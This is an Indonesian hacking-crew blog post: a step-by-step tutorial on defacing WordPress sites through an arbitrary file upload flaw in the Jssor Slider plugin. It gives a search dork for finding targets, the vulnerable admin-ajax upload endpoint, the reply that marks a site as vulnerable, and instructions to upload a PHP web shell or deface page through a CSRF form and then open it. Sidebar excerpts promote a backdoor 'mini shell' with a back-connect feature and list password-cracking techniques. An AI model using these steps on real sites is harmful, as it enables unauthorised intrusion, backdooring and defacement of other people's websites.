Langsung ke konten utama

Jssor Arbitary File Upload<WordPress>


Image result for exi2t cyber team

Hallo Semua sore sore gini enak nya bikin anak eh tutor ea.

1.Dork: Inurl:/wp-content/jssor-slider/ site:
2.Exploit:/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Pertama kalian Dorking Dulu> Pilih salah satu website dan masuka exploit.





Jika vuln terdapat tulisan= {"jsonrpc" : "2.0", "result" : null, "id" : "id"} | Lihat gambar.

Okay masukan website nya kedalam CSRF Ganti Site.com menjadi website yang vuln, Jika sudah simpan sript dengan format .HTML

Jika sudah, buka CSRF tersebut.

Klik upload.







Upload Shell kalian ber extensi .php atau upload script deface kalian.

Jika Sudah Ter upload, buka SHELL atau SCRIPT deface.

Akses 

 /wp-content/jssor-slider/jssor-uploads/nama script.html

 /wp-content/jssor-slider/jssor-uploads/nama shell.php.



Sekian Tutorial Deface Jssor Arbitary Dari Saya jan9kr1k.

Support & Like Fp Kami 


Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Br3ak4r Mini Shell V.01

 Br3ak4r Mini Shell by JAN9KR1K Hallo semua balik lagi bersama gua, kali ini gua luncurin shell baru, yaitu Br3ak4r Mini Shell, shell backdoor mini, pas banget buat nge-upload di server rendah(low), shell ini di lengkapi dengan beberap fungsi. Uploader- PhpInfo- Code Injector- Domains list- Back Connecter- Kill Shell- Ya fitur lain masih dalam pengembangan, tunggu aja V.02, gw usahain shell masih size kecil, biar cepet pas nge-upload. Untuk lihat script klik link di bawah KLIK ME SENPAII :*  Selamat Tahun Baru 2019 cokk. Support Ter00s
Posting Komentar
Baca selengkapnya

5 Cara untuk memulai bisnis Online/Internet

Nooooyoooo, Kali ini saya akan membagikan cara/tips memulai bisnis di internet, dengan simple saya menyajikan 5 tahap agar bisnis di internet bisa tercapai, jangan ragu untuk memulai , lihat,lakukan,kerjakan. okay SWIPE DOWN!!!  1. Membangun Blog/ Website Menurut saya, ini adalah langkah awal paling mudah yang bisa dilakukan oleh seorang pemula untuk membangun sebuah bisnis online. Belajar membangun sebuah blog/ website dengan topik tertentu dan memberikan manfaat bagi audiens adalah sesuatu yang tidak terlalu sulit. Kita bisa membuat blog yang berhubungan dengan minat/hobby dan keahlian, tentu ada banyak orang yang punya minat atau hobby yang sama dengan Anda. Mereka inilah yang nantinya menjadi audiens Anda. Setelah blog/ website Anda memliki banyak pengunjung, Anda bisa memonetize blog tersebut dengan banyak cara. Beberapa cara memonetize blog Anda adalah dengan memasang iklan, misalnya menjadi publisher dan memasang iklan PPC Google Adsense, iklan produk sendiri, iklan a...
Posting Komentar
Baca selengkapnya

6 Teknik yang Paling sering dilakukan para hacker untuk HACK Password

6 Teknik yang Paling Sering Digunakan Untuk Hack Password 1. Dictionary Teknik pertama yang paling sering digunakan untuk hack password disebut  Dictionary Attack . Dictionary sendiri jika diartikan dalam  bahasa Indonesia  berarti kamus. Serangan ini menggunakan sebuah  kamus khusus  yang berisi berbagai macam password yang sering digunakan banyak orang, seperti  QWERTY , 123456, password, mynoob, dan lain sebagainya. 2. Brute Force Selanjutnya ada teknik terkenal lainnya yang disebut  Brute Force . Caranya dilakukan dengan  mencoba setiap kombinasi karakter  yang memungkinkan. Serangan Brute Force juga akan mencoba  kombinasi karakter alfanumerik  yang paling sering digunakan. Seperti misalnya sandi, 1q2w3e4r5t, zxcvbnm, dan qwertyuiop. 3. Phishing Phishing  biasanya dikirim oleh para hacker melalui email. Sudah  miliaran email phishing yang dikirim ke para pengguna internet di seluruh dunia. Car...
1 komentar
Baca selengkapnya